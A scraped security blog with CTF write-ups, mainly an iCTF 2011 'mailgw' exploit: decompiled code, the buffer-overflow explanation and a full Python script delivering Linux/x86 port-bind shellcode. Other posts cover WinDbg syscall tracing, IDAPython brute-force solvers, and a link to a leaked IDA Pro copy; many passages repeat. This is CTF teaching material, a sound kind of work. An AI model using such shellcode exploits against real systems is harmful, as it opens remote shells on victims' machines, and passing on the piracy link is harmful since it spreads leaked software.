Thursday, February 7, 2013
Detecting abnormal executable files using binary code mining
P.S. Please don't shy to add comments and ideas!
Read more...
Saturday, December 3, 2011
Write up Mailgw ICTF2011
It was best CTF, which I ever played. Thanks to organisers very much. I'm in TU Berlin write know and I played with ENOFLAG team.
In this topic I will describe mailgw service.
Lets analyse it with IDA. Analysis of server application should starts from accept function.
As you can see. Child logic provides in manage_tcp_client function.
There is a switch with following values:
n - create account;
q - quit;
m - message;
r - read;
+ - create recipient;
- - create recipient;
l - list recipients;
s - send message.
Main attention attract the '+' block.
There is memory allocation and
7 means EXEC+WRITE+READ. What I've done first, is patch this value to 3.
Next interesting place is filling protected buffer with code.
This buffer can be dissembled.
As you can see from this peace of code, that the no limits for adding values in s2 buffer. And also there is a possibility to write over own code to s2+260. But first of all we need to find a place where this buffer called. Note, that buffer size if 284. Last values are list entry's. Also, note, that, for adding and deleting recipients, necessary to add + in the first place and | as last symbol.
Lets move to the '-' handler.
As you can see.There is a call s2 + 261 in '-' handler, is the recipients exist in list.
So. What's only needed is to put shellcode, as a recipent, to the buffer and then delete this reciepent. The one problem was to through away from strcmp function. For such purpose add 00 value as a first value.
Then put shellcode and at the offset 261 put relative jmp to 260 bytes back. "\xe9\xf7\xfe\xff\xff".
In my example I take Linux/x86 - forking portbind shellcode - port=0xb0ef(45295) - 200 bytes from Shell-Storm
Read more...
In this topic I will describe mailgw service.
Lets analyse it with IDA. Analysis of server application should starts from accept function.
while ( 1 )
{
v23 = 16;
v24 = accept(v25, (struct sockaddr *)&v28, (socklen_t *)&v23);
if ( v24 < 0 )
{
v13 = __errno_location();
v14 = strerror(*v13);
fprintf(stderr, "ERROR: accept on socket failed: %s\n", v14);
result = 1;
goto LABEL_34;
}
v19 = fork();
if ( v19 < 0 )
{
v15 = __errno_location();
v16 = strerror(*v15);
fprintf(stderr, "ERROR: fork failed: %s\n", v16);
result = 1;
goto LABEL_34;
}
if ( !v19 )
break;
close(v24);
}
dup2(v24, 0);
dup2(v24, 1);
result = manage_tcp_client();
}
{
v23 = 16;
v24 = accept(v25, (struct sockaddr *)&v28, (socklen_t *)&v23);
if ( v24 < 0 )
{
v13 = __errno_location();
v14 = strerror(*v13);
fprintf(stderr, "ERROR: accept on socket failed: %s\n", v14);
result = 1;
goto LABEL_34;
}
v19 = fork();
if ( v19 < 0 )
{
v15 = __errno_location();
v16 = strerror(*v15);
fprintf(stderr, "ERROR: fork failed: %s\n", v16);
result = 1;
goto LABEL_34;
}
if ( !v19 )
break;
close(v24);
}
dup2(v24, 0);
dup2(v24, 1);
result = manage_tcp_client();
}
As you can see. Child logic provides in manage_tcp_client function.
There is a switch with following values:
n - create account;
q - quit;
m - message;
r - read;
+ - create recipient;
- - create recipient;
l - list recipients;
s - send message.
Main attention attract the '+' block.
There is memory allocation and
mprotect((void *)(-v12 & (unsigned int)s2), ((unsigned int)&s2[v12 + 283] & -v12) - (_DWORD)addr, 7);
7 means EXEC+WRITE+READ. What I've done first, is patch this value to 3.
Next interesting place is filling protected buffer with code.
v15 = s2 + 260;
i = 0;
s2[260] = -52;
++i;
*(_DWORD *)&v15[i] = 0x82474FFu;
i += 4;
*(_DWORD *)&v15[i] = 0x82454FFu;
i += 4;
*(_DWORD *)&v15[i] = 0xC304C483u;
i = 0;
while ( 2 )
{
if ( read(0, &ptr, 1u) )
{
s2[i] = ptr;
if ( ptr != 124 )
{
++i;
continue;
}
s2[i] = 0;
}
break;
}
i = 0;
s2[260] = -52;
++i;
*(_DWORD *)&v15[i] = 0x82474FFu;
i += 4;
*(_DWORD *)&v15[i] = 0x82454FFu;
i += 4;
*(_DWORD *)&v15[i] = 0xC304C483u;
i = 0;
while ( 2 )
{
if ( read(0, &ptr, 1u) )
{
s2[i] = ptr;
if ( ptr != 124 )
{
++i;
continue;
}
s2[i] = 0;
}
break;
}
This buffer can be dissembled.
push dword ptr [esp+0x8]
call dword ptr [esp+0x8]
add esp, 0x4
ret
call dword ptr [esp+0x8]
add esp, 0x4
ret
As you can see from this peace of code, that the no limits for adding values in s2 buffer. And also there is a possibility to write over own code to s2+260. But first of all we need to find a place where this buffer called. Note, that buffer size if 284. Last values are list entry's. Also, note, that, for adding and deleting recipients, necessary to add + in the first place and | as last symbol.
Lets move to the '-' handler.
for ( s2 = *(char **)&recipients[276]; s2 != recipients; s2 = (char *)*((_DWORD *)s2 + 69) )
{
if ( !strcmp(s1, s2) )
{
((void (__cdecl *)(_DWORD, char *))(s2 + 261))(*((_DWORD *)s2 + 64), s2);
*(_DWORD *)(*((_DWORD *)s2 + 69) + 280) = *((_DWORD *)s2 + 70);
*(_DWORD *)(*((_DWORD *)s2 + 70) + 276) = *((_DWORD *)s2 + 69);
if ( debug )
fprintf(stderr, "Recipient %s removed\n", s1);
free(s2);
s2 = 0;
break;
}
}
{
if ( !strcmp(s1, s2) )
{
((void (__cdecl *)(_DWORD, char *))(s2 + 261))(*((_DWORD *)s2 + 64), s2);
*(_DWORD *)(*((_DWORD *)s2 + 69) + 280) = *((_DWORD *)s2 + 70);
*(_DWORD *)(*((_DWORD *)s2 + 70) + 276) = *((_DWORD *)s2 + 69);
if ( debug )
fprintf(stderr, "Recipient %s removed\n", s1);
free(s2);
s2 = 0;
break;
}
}
As you can see.There is a call s2 + 261 in '-' handler, is the recipients exist in list.
So. What's only needed is to put shellcode, as a recipent, to the buffer and then delete this reciepent. The one problem was to through away from strcmp function. For such purpose add 00 value as a first value.
Then put shellcode and at the offset 261 put relative jmp to 260 bytes back. "\xe9\xf7\xfe\xff\xff".
In my example I take Linux/x86 - forking portbind shellcode - port=0xb0ef(45295) - 200 bytes from Shell-Storm
import socket
import sys
HOST, PORT = "192.168.1.3", 9119
shell = "\x00"
shell +="\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
shell +="\x06\x51\xb1\x01\x51\xb1\x02\x51"
shell +="\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
shell +="\x89\xc1\x31\xc0\x31\xdb\x50\x50"
shell +="\x50\x66\x68\xb0\xef\xb3\x02\x66"
shell +="\x53\x89\xe2\xb3\x10\x53\xb3\x02"
shell +="\x52\x51\x89\xca\x89\xe1\xb0\x66"
shell +="\xcd\x80\x31\xdb\x39\xc3\x74\x05"
shell +="\x31\xc0\x40\xcd\x80\x31\xc0\x50"
shell +="\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
shell +="\x80\x89\xd7\x31\xc0\x31\xdb\x31"
shell +="\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
shell +="\x80\x31\xc0\x31\xdb\x50\x50\x57"
shell +="\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
shell +="\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
shell +="\xcd\x80\x39\xc3\x75\x40\x31\xc0"
shell +="\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
shell +="\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
shell +="\x31\xc0\x41\xb0\x3f\xcd\x80\x31"
shell +="\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
shell +="\x50\x68\x2f\x2f\x73\x68\x68\x2f"
shell +="\x62\x69\x6e\x89\xe3\x8b\x54\x24"
shell +="\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
shell +="\x80\x31\xc0\x40\xcd\x80\x31\xc0"
shell +="\x89\xf3\xb0\x06\xcd\x80\xeb\x99"
shell +="\x90" * (261 - len(shell))
print len(shell)
shell +="\xe9\xf7\xfe\xff\xff"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
str1 = '+'+ shell + "|\n"
print str1
sock.send(str1)
str2 = '-'+ shell + "|\n"
sock.send(str2)
sock.close()
import sys
HOST, PORT = "192.168.1.3", 9119
shell = "\x00"
shell +="\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
shell +="\x06\x51\xb1\x01\x51\xb1\x02\x51"
shell +="\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
shell +="\x89\xc1\x31\xc0\x31\xdb\x50\x50"
shell +="\x50\x66\x68\xb0\xef\xb3\x02\x66"
shell +="\x53\x89\xe2\xb3\x10\x53\xb3\x02"
shell +="\x52\x51\x89\xca\x89\xe1\xb0\x66"
shell +="\xcd\x80\x31\xdb\x39\xc3\x74\x05"
shell +="\x31\xc0\x40\xcd\x80\x31\xc0\x50"
shell +="\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
shell +="\x80\x89\xd7\x31\xc0\x31\xdb\x31"
shell +="\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
shell +="\x80\x31\xc0\x31\xdb\x50\x50\x57"
shell +="\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
shell +="\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
shell +="\xcd\x80\x39\xc3\x75\x40\x31\xc0"
shell +="\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
shell +="\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
shell +="\x31\xc0\x41\xb0\x3f\xcd\x80\x31"
shell +="\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
shell +="\x50\x68\x2f\x2f\x73\x68\x68\x2f"
shell +="\x62\x69\x6e\x89\xe3\x8b\x54\x24"
shell +="\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
shell +="\x80\x31\xc0\x40\xcd\x80\x31\xc0"
shell +="\x89\xf3\xb0\x06\xcd\x80\xeb\x99"
shell +="\x90" * (261 - len(shell))
print len(shell)
shell +="\xe9\xf7\xfe\xff\xff"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
str1 = '+'+ shell + "|\n"
print str1
sock.send(str1)
str2 = '-'+ shell + "|\n"
sock.send(str2)
sock.close()
Wednesday, July 20, 2011
PykdTrace
Ciss Hot Summer has a lot of different ways to do, but I choose bug hunting and trace building.
Some researches make trace with Temu, some use debuggers: MyNav, ProcessStalker. But, for kernel purpose, as you know, we need to use WinDbg. Big advantage that Windbg works everywhere.
It’s not a secret that kernel researches use Windbg for rootkit hunting and Analyzing. You can find a lot of scripts in KDAR project.
But It’s not comfortable to use Windbg script, so pykd project was born.
Today I would like to present you small overview of pykd and my own script for tracing syscalls.
!py pykdtrace.py dropper and any droppers in VMware and go to sleep.
Looks pretty simple. But I have few remarks:
Another experiment with kernel tracing I will make with Ida and some IoCtl handler.
Good Luck.
P.S. I’m think that windows driver for temu is big. It’s my fault. You can see him for Win 7 from Linux driver developer in Olshanov repository.
Read more...
Some researches make trace with Temu, some use debuggers: MyNav, ProcessStalker. But, for kernel purpose, as you know, we need to use WinDbg. Big advantage that Windbg works everywhere.
It’s not a secret that kernel researches use Windbg for rootkit hunting and Analyzing. You can find a lot of scripts in KDAR project.
But It’s not comfortable to use Windbg script, so pykd project was born.
Today I would like to present you small overview of pykd and my own script for tracing syscalls.
Let’s start from installing. I can install only version for python 2.7. Another version didn’t work in my Win (It doesn’t work with any VCRedist).
If you installing it from setup packet you already have different examples. If you install only *.pyd file, download it, because documentation on his site is sparse. It’s time to make some experiments.
As any debugger tracer, it’s necessary to insert breakpoints and handle them. Pykd has bp class. Handler must return DEBUG_STATUS_GO or DEBUG_STATUS_GO_HANDLER, to continue execution or stopping.
Next task is monitoring creating process and his child’s. You can find many different ways, but I’d like to control PspInsertProcess and PspProcessDelete. These functions append and remove EPROCESS to\from PsActiveProcessList. In my script I create a BPHandler class which contains handlers for Processes and Syscalls bps. Syscall bps enables when you process with started. For this purpose pykd has typeVar class.
In Syscall handler we needs to get eprocess too. In this case I’d like to show you another command – dbgCommand
If you installing it from setup packet you already have different examples. If you install only *.pyd file, download it, because documentation on his site is sparse. It’s time to make some experiments.
.load pykd.pyd - load extension in WinDbg.
!py name.py – starting script. Don’t forget to set PYTHONPATH because otherwise any dependencies will not work.Have fun? …
As any debugger tracer, it’s necessary to insert breakpoints and handle them. Pykd has bp class. Handler must return DEBUG_STATUS_GO or DEBUG_STATUS_GO_HANDLER, to continue execution or stopping.
Then you should type go() in you script. Pykd set bp only after immediately start.bp( nt.DbgPrint, Handler)
Next task is monitoring creating process and his child’s. You can find many different ways, but I’d like to control PspInsertProcess and PspProcessDelete. These functions append and remove EPROCESS to\from PsActiveProcessList. In my script I create a BPHandler class which contains handlers for Processes and Syscalls bps. Syscall bps enables when you process with
And you can use eprocess like a structure - eprocess.UniqueProcessId.eprocess = typedVar("nt", "_EPROCESS", reg(“eax”)
In Syscall handler we needs to get eprocess too. In this case I’d like to show you another command – dbgCommand
Starting scriptdef GetCurrentProcess(self):
str = dbgCommand(".printf \"%x\n\", poi(poi(fs:[0x124])+0x50)")
return int(str, 16)
f60:nt!NtAlpcConnectPortWake up and see big log file. Result of syscall I’m using for some metamorphic experiments, but it can be used for tracing drivers and so on. Change GetSyscallList function and get another Bp list for your purpose.
f9c:nt!NtAllocateVirtualMemory
f9c:nt!NtAllocateVirtualMemory
f9c:nt!NtAllocateVirtualMemory
Looks pretty simple. But I have few remarks:
Pykd doesn’t show me python exceptions (print debug engine works fine. It’s makes me crazy) Pykd doesn’t call destructor of any classes.( So It doesn’t deleted bp and doesn’t close file, when I stopping it by initial break.) Pykd is slow engine for tracing purposes, But for rootkit hunting it’s really good things.
Another experiment with kernel tracing I will make with Ida and some IoCtl handler.
Good Luck.
P.S. I’m think that windows driver for temu is big. It’s my fault. You can see him for Win 7 from Linux driver developer in Olshanov repository.
Wednesday, July 13, 2011
IDA Pro 6.1 + HexRays 1.5 leaked
long-awaited leaked.
IDA Pro 6.1 + HexRays 1.5 leaked: http://t.co/EXqytpT (sendspace.com).
Epic story: http://t.co/n7awBas (rus)
Read more...
IDA Pro 6.1 + HexRays 1.5 leaked: http://t.co/EXqytpT (sendspace.com).
Epic story: http://t.co/n7awBas (rus)
Read more...
Thursday, June 2, 2011
Unpacked bootmgr x86 part
Unpacked bootmgr
First 5 sections is correct. Other segments are wrong. But anymore IDA can associate it with pdb.
This version is check Win 7 Sp0. You also can find free version or asking me.
Also there are small differences after ms-advisory-2506014-x64.
Read more...
First 5 sections is correct. Other segments are wrong. But anymore IDA can associate it with pdb.
This version is check Win 7 Sp0. You also can find free version or asking me.
Also there are small differences after ms-advisory-2506014-x64.
Tuesday, April 12, 2011
IDAPython and CTF Task
Few month ago I read post “IDA + Python = Love” in “Hacker” journal and been a pist off, because it is translate from HexBlog
Every CTF quals we have interesting reverse task with Brute Force. Let's get reverse 100 from RuCTF quals 2009.
It was pretty simple binary with checking string function.
First of all start debugger and open python command line.
In console menu you can see results:
Another Example, It's necessary to call some function with different parameters. Look at reverse 200 in RuCTF quals 2009. We have a hex string 0408151623426C12 and dll. Find a upper function in Graph mode.
If you have a Hex-Rays(or IDA 5.5) you can decompile it and get a function prototype. Here is it
Like in last example
Result: 69da2403d2416d3c8042625839d400
Since I starting interesting boot code in Windows, I use bochs for any researches. Support of bochs in IDA start from 5.4 version. IDA 5.5 can works only with bochs 2.3.7, because can't get register information from new versions. IDA 6.0 with IDA 5.5 plugins of bochs works fine with 2.4.5.
I didn't make this task in CTF time, but I have a one interesting decision method. You can read detailed write up on Leet More blog.
First of all lets make bochsrc file for issue500.bin.
A already has one. This example works fine in 2.4 and 2.3. For you purpose only modify string as you need
Next step is starting IDA with bochs. Unfortunately I don't have full IDA version upper then 5.5. And can't use Appcall. IDA 6.0 demo send me this screen.
So I will talk about IDA 5.5 in this section and if you have newer version PLEASE check Appcall for 16bit code. I hope it will works fine.
Starting IDA. Then i main menu choose Debugger->Run->Local Bochs Debugger.
In next window choose full path to *.bxrc file.
Next step is "Debug options->Set speciefic options"
Set full path to bochsdbg.exe, and choose Disk image.
That's all preferences which we need. Start debugger and wait until IDA create db. Then bochs told you about bad disk geometry - push continue. And then you image will ask you a password. Look at the call stack and find "debug#" segment. Put bp after "int" and push enter.
Now you are in input pass function and lower a pass checker function. At the picture you can see this simple function, which called for each simbol. DX started from 0 and after all symbols must be 0x2002.
You can write algorithm on python or C, but it cool - use debugger for brute.
Please check it in newer version of IDA and give me know.
Really crazy task with brute. I will show you script for my first idea about this task. Shortly we have a binary, which want 10 symbols string which satisfy claims of sub_40181A(brute_f). This function check input string with table started from 0x403182. Indexing in dict and so on makes me crazy so I make a script which reverse function execution. It means that we get a last value - 0xD4, find it in dictionary, calculate offset and search it again.
I get a string like h2 h2h2 h2. reverse it to 2h 2h2h 2h and put in program input - get a 50%.
Then if you want to check possible variants you need a construction like this. (val_4d = 0x40317E)
Thank you for attention. Have a nice CTFs with IDApython.
Read more...
Appcall is a mechanism used to call functions inside the debugged program from the debugger or your script as if it were a built-in function.So you don't need a ctypes for simple operations.
Today I will show how you can use this technics in different CTF tasks with IDA 6.0 demo.
RuCTF2009 Quals Reverse 100
Every CTF quals we have interesting reverse task with Brute Force. Let's get reverse 100 from RuCTF quals 2009.
It was pretty simple binary with checking string function.
- Initialize Appcall object - find a function by name and confront prototype.
- Find String pointer with IDC LocByName function and patch them by PutDataList.
- Initialize permutation object and start the script.
import string
from idautils import PutDataList
from idc import LocByName
from itertools import product
brute = Appcall.proto("brute_f", "int __cdecl brute_f();")
def patchString( val ):
PutDataList( LocByName('string'), map( lambda(i):ord(i), val))
for i in xrange(3):
for str in product( string.letters + string.digits, repeat=i):
patchString(str)
if brute() == 1:
print ''.join(str)
from idautils import PutDataList
from idc import LocByName
from itertools import product
brute = Appcall.proto("brute_f", "int __cdecl brute_f();")
def patchString( val ):
PutDataList( LocByName('string'), map( lambda(i):ord(i), val))
for i in xrange(3):
for str in product( string.letters + string.digits, repeat=i):
patchString(str)
if brute() == 1:
print ''.join(str)
In console menu you can see results:
aF nh oY p4 rV sg D5 FW Gf HH Iy Tv UG Zi 18 2k 3Z
RuCTF2009 Quals Reverse 200
Another Example, It's necessary to call some function with different parameters. Look at reverse 200 in RuCTF quals 2009. We have a hex string 0408151623426C12 and dll. Find a upper function in Graph mode.
If you have a Hex-Rays(or IDA 5.5) you can decompile it and get a function prototype. Here is it
int __fastcall func(char *, char *, char *);Presence of calling convention is obligatory.
Like in last example
- initializing Appcall object
- creating input and output buffers.
- calling function
test = Appcall.proto("func", " int __fastcall func(char *, char *, char *);")
bufin = Appcall.buffer( "\x04\x08\x15\x16\x23\x42\x6C\x12")
buffout1 = Appcall.buffer ( "\x00" * 15 )
buffout2 = Appcall.buffer ( "\x00" * 15 )
test( bufin, buffout1, buffout2 )
print buffout1.value.encode('hex')
bufin = Appcall.buffer( "\x04\x08\x15\x16\x23\x42\x6C\x12")
buffout1 = Appcall.buffer ( "\x00" * 15 )
buffout2 = Appcall.buffer ( "\x00" * 15 )
test( bufin, buffout1, buffout2 )
print buffout1.value.encode('hex')
Result: 69da2403d2416d3c8042625839d400
Codegate 2011 Quals Issue 500
Since I starting interesting boot code in Windows, I use bochs for any researches. Support of bochs in IDA start from 5.4 version. IDA 5.5 can works only with bochs 2.3.7, because can't get register information from new versions. IDA 6.0 with IDA 5.5 plugins of bochs works fine with 2.4.5.
I didn't make this task in CTF time, but I have a one interesting decision method. You can read detailed write up on Leet More blog.
First of all lets make bochsrc file for issue500.bin.
A already has one. This example works fine in 2.4 and 2.3. For you purpose only modify string as you need
ata0-master: type=disk, mode=flat, translation=auto, path="$CODEGATE\iss500\issue500.bin", cylinders=6500, heads=255, spt=63, biosdetect=auto, model="test"
Next step is starting IDA with bochs. Unfortunately I don't have full IDA version upper then 5.5. And can't use Appcall. IDA 6.0 demo send me this screen.
So I will talk about IDA 5.5 in this section and if you have newer version PLEASE check Appcall for 16bit code. I hope it will works fine.
Starting IDA. Then i main menu choose Debugger->Run->Local Bochs Debugger.
In next window choose full path to *.bxrc file.
Next step is "Debug options->Set speciefic options"
That's all preferences which we need. Start debugger and wait until IDA create db. Then bochs told you about bad disk geometry - push continue. And then you image will ask you a password. Look at the call stack and find "debug#" segment. Put bp after "int" and push enter.
Now you are in input pass function and lower a pass checker function. At the picture you can see this simple function, which called for each simbol. DX started from 0 and after all symbols must be 0x2002.
You can write algorithm on python or C, but it cool - use debugger for brute.
RuCTF 2011 Quals Reverse 300
Really crazy task with brute. I will show you script for my first idea about this task. Shortly we have a binary, which want 10 symbols string which satisfy claims of sub_40181A(brute_f). This function check input string with table started from 0x403182. Indexing in dict and so on makes me crazy so I make a script which reverse function execution. It means that we get a last value - 0xD4, find it in dictionary, calculate offset and search it again.
start = "D4"
outstr = ""
import string
strOld = "23456789TJQKAhscd "
start_offset = LocByName("dict")
for i in xrange(0xa):
offset = FindBinary( LocByName("dict"),SEARCH_DOWN, start) - start_offset
print "VA %x RVA %x" % (offset + start_offset, offset)
for i in xrange(0x13):
val = (offset - ( i >> 1 )) / ( 2 * 0x13 )
if (val * ( 0x13 * 2) + i * 2) == offset:
print hex(i) + " '" + strOld[i] + "' " + hex(ord(strOld[i])) + " --> " + hex( val )
start = "%x" % val
outstr += strOld[i]
break
print outstr
outstr = ""
import string
strOld = "23456789TJQKAhscd "
start_offset = LocByName("dict")
for i in xrange(0xa):
offset = FindBinary( LocByName("dict"),SEARCH_DOWN, start) - start_offset
print "VA %x RVA %x" % (offset + start_offset, offset)
for i in xrange(0x13):
val = (offset - ( i >> 1 )) / ( 2 * 0x13 )
if (val * ( 0x13 * 2) + i * 2) == offset:
print hex(i) + " '" + strOld[i] + "' " + hex(ord(strOld[i])) + " --> " + hex( val )
start = "%x" % val
outstr += strOld[i]
break
print outstr
I get a string like h2 h2h2 h2. reverse it to 2h 2h2h 2h and put in program input - get a 50%.
Then if you want to check possible variants you need a construction like this. (val_4d = 0x40317E)
brute = Appcall.proto("brute_f", "int __cdecl brute_f();")
PutDataList( LocByName('string'), b)
brute()
if (Dword(LocByName("val_4d"))) == 0xd4:
print "OK"
PutDataList( LocByName('string'), b)
brute()
if (Dword(LocByName("val_4d"))) == 0xd4:
print "OK"
Thank you for attention. Have a nice CTFs with IDApython.
Subscribe to:
Posts (Atom)